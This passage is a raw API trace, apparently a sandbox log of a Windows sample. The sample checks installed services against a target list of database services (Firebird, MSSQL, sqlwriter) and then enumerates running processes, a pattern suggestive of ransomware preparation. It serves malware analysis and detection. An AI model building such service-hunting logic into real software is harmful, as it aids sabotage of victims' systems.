lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0193.297] lstrlenW (lpString="gpsvc") returned 5 [0193.297] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0193.297] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0193.297] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0193.297] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0193.297] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0193.297] lstrlenW (lpString="iphlpsvc") returned 8 [0193.297] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0193.297] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0193.297] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0193.297] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0193.297] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0193.297] lstrlenW (lpString="KeyIso") returned 6 [0193.297] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0193.297] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0193.298] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0193.298] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0193.298] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0193.298] lstrlenW (lpString="LanmanServer") returned 12 [0193.298] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0193.298] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0193.298] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0193.298] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0193.298] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0193.298] lstrlenW (lpString="LanmanWorkstation") returned 17 [0193.298] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0193.298] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0193.298] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0193.298] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0193.298] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0193.298] lstrlenW (lpString="lfsvc") returned 5 [0193.298] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0193.298] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0193.298] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0193.298] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0193.298] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0193.298] lstrlenW (lpString="LicenseManager") returned 14 [0193.298] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0193.298] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0193.298] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0193.298] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0193.298] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0193.298] lstrlenW (lpString="lmhosts") returned 7 [0193.298] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0193.299] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0193.299] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0193.299] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0193.299] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0193.299] lstrlenW (lpString="LSM") returned 3 [0193.299] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0193.299] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0193.299] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0193.299] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0193.299] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0193.299] lstrlenW (lpString="MpsSvc") returned 6 [0193.299] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0193.299] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0193.299] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0193.299] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0193.299] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0193.299] lstrlenW (lpString="NcbService") returned 10 [0193.299] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0193.299] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0193.299] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0193.299] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0193.299] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0193.299] lstrlenW (lpString="netprofm") returned 8 [0193.299] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0193.299] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0193.299] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0193.299] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0193.299] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0193.299] lstrlenW (lpString="NlaSvc") returned 6 [0193.299] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0193.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0193.300] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0193.300] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0193.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0193.300] lstrlenW (lpString="nsi") returned 3 [0193.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0193.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0193.300] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0193.300] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0193.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0193.300] lstrlenW (lpString="PcaSvc") returned 6 [0193.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0193.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0193.300] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0193.300] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0193.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0193.300] lstrlenW (lpString="PlugPlay") returned 8 [0193.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0193.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0193.300] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0193.300] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0193.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0193.300] lstrlenW (lpString="Power") returned 5 [0193.300] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0193.300] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0193.300] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0193.300] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0193.300] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0193.300] lstrlenW (lpString="ProfSvc") returned 7 [0193.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0193.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0193.301] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0193.301] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0193.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0193.301] lstrlenW (lpString="RpcEptMapper") returned 12 [0193.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0193.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0193.301] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0193.301] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0193.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0193.301] lstrlenW (lpString="RpcSs") returned 5 [0193.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0193.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0193.301] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0193.301] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0193.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0193.301] lstrlenW (lpString="SamSs") returned 5 [0193.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0193.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0193.301] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0193.301] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0193.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0193.301] lstrlenW (lpString="Schedule") returned 8 [0193.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0193.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0193.301] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0193.301] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0193.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0193.302] lstrlenW (lpString="SecurityHealthService") returned 21 [0193.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0193.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0193.302] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0193.302] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0193.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0193.302] lstrlenW (lpString="SENS") returned 4 [0193.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0193.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0193.302] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0193.302] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0193.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0193.302] lstrlenW (lpString="ShellHWDetection") returned 16 [0193.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0193.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0193.302] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0193.302] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0193.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0193.302] lstrlenW (lpString="Spooler") returned 7 [0193.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0193.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0193.302] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0193.302] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0193.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0193.302] lstrlenW (lpString="sppsvc") returned 6 [0193.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0193.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0193.302] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0193.302] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0193.303] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0193.303] lstrlenW (lpString="SSDPSRV") returned 7 [0193.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0193.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0193.303] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0193.303] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0193.303] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x37c [0193.324] Process32FirstW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.325] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0193.325] lstrlenW (lpString="System") returned 6 [0193.325] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0193.326] lstrlenW (lpString="smss.exe") returned 8 [0193.326] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0193.327] lstrlenW (lpString="csrss.exe") returned 9 [0193.327] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0193.328] lstrlenW (lpString="wininit.exe") returned 11 [0193.328] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0193.329] lstrlenW (lpString="csrss.exe") returned 9 [0193.329] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0193.330] lstrlenW (lpString="winlogon.exe") returned 12 [0193.330] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0193.331] lstrlenW (lpString="services.exe") returned 12 [0193.331] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0193.332] lstrlenW (lpString="lsass.exe") returned 9 [0193.332] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.333] lstrlenW (lpString="svchost.exe") returned 11 [0193.333] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0193.333] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0193.334] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0193.334] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0193.334] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.335] lstrlenW (lpString="svchost.exe") returned 11 [0193.335] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0193.336] lstrlenW (lpString="dwm.exe") returned 7 [0193.336] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.337] lstrlenW (lpString="svchost.exe") returned 11 [0193.337] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.338] lstrlenW (lpString="svchost.exe") returned 11 [0193.338] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.339] lstrlenW (lpString="svchost.exe") returned 11 [0193.339] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.340] lstrlenW (lpString="svchost.exe") returned 11 [0193.340] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.341] lstrlenW (lpString="svchost.exe") returned 11 [0193.341] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.347] lstrlenW (lpString="svchost.exe") returned 11 [0193.347] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.348] lstrlenW (lpString="svchost.exe") returned 11 [0193.348] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.349] lstrlenW (lpString="svchost.exe") returned 11 [0193.349] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.350] lstrlenW (lpString="svchost.exe") returned 11 [0193.350] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0193.351] lstrlenW (lpString="spoolsv.exe") returned 11 [0193.351] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.352] lstrlenW (lpString="svchost.exe") returned 11 [0193.352] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.353] lstrlenW (lpString="svchost.exe") returned 11 [0193.353] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0193.354] lstrlenW (lpString="audiodg.exe") returned 11 [0193.354] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0193.355] lstrlenW (lpString="sihost.exe") returned 10 [0193.355] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.356] lstrlenW (lpString="svchost.exe") returned 11 [0193.356] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0193.357] lstrlenW (lpString="taskhostw.exe") returned 13 [0193.357] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0193.357] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0193.357] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0193.358] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0193.358] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3a, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0193.359] lstrlenW (lpString="explorer.exe") returned 12 [0193.359] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0193.360] lstrlenW (lpString="Memory Compression") returned 18 [0193.360] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0193.361] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0193.361] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0193.362] lstrlenW (lpString="SearchUI.exe") returned 12 